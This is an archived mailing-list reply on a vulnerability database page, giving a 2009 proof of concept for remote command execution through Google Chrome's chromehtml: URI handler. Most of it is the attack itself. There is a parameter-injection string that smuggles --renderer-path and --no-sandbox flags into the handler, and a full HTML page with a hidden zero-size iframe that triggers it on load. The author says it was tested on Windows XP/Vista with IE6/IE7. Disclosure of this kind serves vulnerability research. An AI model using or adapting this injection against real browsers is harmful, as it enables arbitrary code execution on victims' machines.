Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21256
HistoryJan 31, 2009 - 12:00 a.m.

Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC

2009-01-3100:00:00
vulners.com
9

Try this:

chromehtml:"%20–renderer-path="calc"%20–no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works …

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20–renderer-path="calc"%20–no-sandbox' width=0 height=0></iframe>
</body></html>